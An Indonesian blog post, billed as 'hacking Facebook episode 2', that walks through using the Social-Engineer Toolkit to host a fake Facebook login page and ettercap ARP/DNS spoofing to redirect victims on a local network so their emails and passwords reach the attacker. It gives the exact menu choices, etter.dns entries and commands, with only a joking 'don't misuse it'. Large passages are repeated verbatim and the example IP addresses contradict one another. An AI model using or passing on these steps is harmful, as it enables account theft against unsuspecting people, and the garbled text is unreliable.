tak bosan-bosannya belajar mengenai backtrack dan ini hacking facebook episode 2 :D hehe
kali ini saya akan share tricks tentang SET atau Social-Engineering Toolkit
SET ini sudah tersedia di Backtrack 5 . ini sejenis fake login yang alamatnya adalah ip address kita misalnya 192.168.1.1 .
mulai pada penasaran yah pastinya kalian sobat? hehe gausah pakai lama deh mari kita mulai dan perhatikan yah perintahnya :
Pertama buka terminal :
1. masukkan perintah : cd /pentest/exploits/set (enter)
2. masukkan perintah : ./set (enter)
3. pilih Social-Engineering Attacks dengan cara tekan angka 1 (enter)
4. pilih Website Attack Vectors tekan 2 (enter)
5. pilih Credential Harvester Attack Method tekan 3 (enter)
6. pilih Web Templates tekan 1 (enter)
7. IP address for the POST back in Harvester/Tabnabbing: 192.168.1.1 (IP address kita)
jika memilih Site Cloner kita perlu memasukan alamat web yang akan kita buat menjadi fake login, dan jika web templates kita tinggal memilih yang sudah disediakan oleh SET itu sendiri, facebook,gmail,google,twitter dan Java required contohnya.
8. tinggal pilih template yg mana, untuk contoh kita coba facebook, pilih 4
9. Press {return} to continue. tekan enter.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
berarti SET sudah selesai....eiitss jangan di close.. :p nanti passwordnya muncul di bawah itu..
Bagaimana SET akan bekerja ? jika korban memubuka alamat http://ipadresskita atau http://192.168.1.1 misalnya maka tampilannya akan seperti facebook, dan ketika korban login , akan terkirim ussername and password ke terminal kita...( untuk melihat ip address , lakukan perintah ifconfig pada terminal)
Tapi sangat tipis kemungkinan korban mengakses http://192.168.1.1 , lalu bagaimana agar korban dapat membuka http://192.168.1.1 / ip address kita ?? lakukan saja DNS SPOOFING...
oke kita buat agar setiap korban mengakses http://www.facebook.com akan beralih ke http://192.168.1.3 korban tidak akan curiga karena url tetap www.facebook.com dan tampilannya pun sama persis...
1. buka etter dns dengan perintah gedit /usr/local/share/ettercap/etter.dns
2. edit menjadi :
facebook.com A 192.168.1.1
*.facebook.com A 192.168.1.1
192.168.0.3 itu contoh ip saya...
setelah itu save..
3. jalankan dns spoofing dengan perintah
ettercap -Tqi (interfaces) -P dns_spoof -M ARP // //
interfaces saya eth0 ( lihat di ifconfig ) jadi perintahnya seperti ini :
ettercap -Tqi eth0 -P dns_spoof -M ARP // //
9. Press {return} to continue. tekan enter.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
berarti SET sudah selesai....eiitss jangan di close.. :p nanti passwordnya muncul di bawah itu..
Bagaimana SET akan bekerja ? jika korban memubuka alamat http://ipadresskita atau http://192.168.1.1 misalnya maka tampilannya akan seperti facebook, dan ketika korban login , akan terkirim ussername and password ke terminal kita...( untuk melihat ip address , lakukan perintah ifconfig pada terminal)
Tapi sangat tipis kemungkinan korban mengakses http://192.168.1.1 , lalu bagaimana agar korban dapat membuka http://192.168.1.1 / ip address kita ?? lakukan saja DNS SPOOFING...
oke kita buat agar setiap korban mengakses http://www.facebook.com akan beralih ke http://192.168.1.3 korban tidak akan curiga karena url tetap www.facebook.com dan tampilannya pun sama persis...
1. buka etter dns dengan perintah gedit /usr/local/share/ettercap/etter.dns
2. edit menjadi :
facebook.com A 192.168.1.1
*.facebook.com A 192.168.1.1
192.168.0.3 itu contoh ip saya...
setelah itu save..
3. jalankan dns spoofing dengan perintah
ettercap -Tqi (interfaces) -P dns_spoof -M ARP // //
interfaces saya eth0 ( lihat di ifconfig ) jadi perintahnya seperti ini :
ettercap -Tqi eth0 -P dns_spoof -M ARP // //
**interfaces itu seperti eth0 , wlan0 dsb..
setelah itu , kita buka terminal yang pertama (SET)
kita tunggu sampai korban login..nanti akan ada email dan password , silahkan gunakan dengan bijak yah kawan :D jangan di salah gunakan :p
note: berhasil atau tidaknya tergantung anda,,, karena belajar sesuatu hal yang baru tidak semudah membalikkan telapak tangan,,, good luck
setelah itu , kita buka terminal yang pertama (SET)
kita tunggu sampai korban login..nanti akan ada email dan password , silahkan gunakan dengan bijak yah kawan :D jangan di salah gunakan :p
note: berhasil atau tidaknya tergantung anda,,, karena belajar sesuatu hal yang baru tidak semudah membalikkan telapak tangan,,, good luck
No comments:
Post a Comment